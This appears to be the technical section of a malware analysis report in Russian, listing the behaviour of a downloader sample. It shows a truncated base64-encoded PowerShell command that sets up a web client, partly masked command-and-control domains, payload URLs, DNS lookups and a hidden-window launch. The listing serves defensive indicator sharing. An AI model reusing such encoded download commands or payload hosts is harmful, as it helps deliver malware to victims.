Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAEEAbwBBAG8AQQAxAHgAPQAoACcAYwBBACcAKwAnADEAQQB3AEIAeABrACcAKQA7ACQAaABCAEIAeABBADEAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\1376272.cvr
- 'me###lzado.com':80
- 'ca###eco.com':80
- 'ki##se.ir':80
- 'ki##se.ir':443
- 'dq###sign.com':80
- 'on###otar.cl':80
- http://me###lzado.com/ib9j3yx/T_K/
- http://www.ca###eco.com/wp-content/languages/yW_c/
- http://ki##se.ir/svsvbk/bz_QS/
- http://dq###sign.com/wp-admin/ee_YO/
- http://on###otar.cl/wp-includes/M_z/
- 'ki##se.ir':443
- DNS ASK me###lzado.com
- DNS ASK ca###eco.com
- DNS ASK ki##se.ir
- DNS ASK dq###sign.com
- DNS ASK on###otar.cl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAEEAbwBBAG8AQQAxAHgAPQAoACcAYwBBACcAKwAnADEAQQB3AEIAeABrACcAKQA7ACQAaABCAEIAeABBADEAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAE...' (со скрытым окном)